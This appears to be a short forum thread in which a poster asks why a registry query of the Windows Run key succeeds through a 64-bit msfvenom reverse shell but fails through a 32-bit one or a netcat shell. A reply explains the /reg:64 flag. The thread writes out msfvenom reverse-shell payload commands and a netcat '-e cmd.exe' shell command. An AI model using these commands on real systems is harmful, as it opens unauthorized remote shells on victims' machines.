Reverse shell and reg query oddness

Got a curious issue I’m hoping to get an answer to. I’m doing a reverse shell using msfvenom. Depending on how I create it, the following command will or will not show results:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

If I use the following reverse shell, that commands returns the contents of the registry key:

msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4343 -f exe -o revshell.exe

But if I use this or just create a netcat shell {nc 4343 -e cmd.exe), the reg query fails:

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4343 -f exe -o revshell.exe

The Windows OS is 64-bit so I’m assuming it has something to do with that but I’d like to get a better understand of why one works and the other doesn’t. Can someone offer some guidance?


To get that to work, you can append the /reg:64 to the end of the reg query:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /reg:64

This topic was automatically closed 3 days after the last reply. New replies are no longer allowed.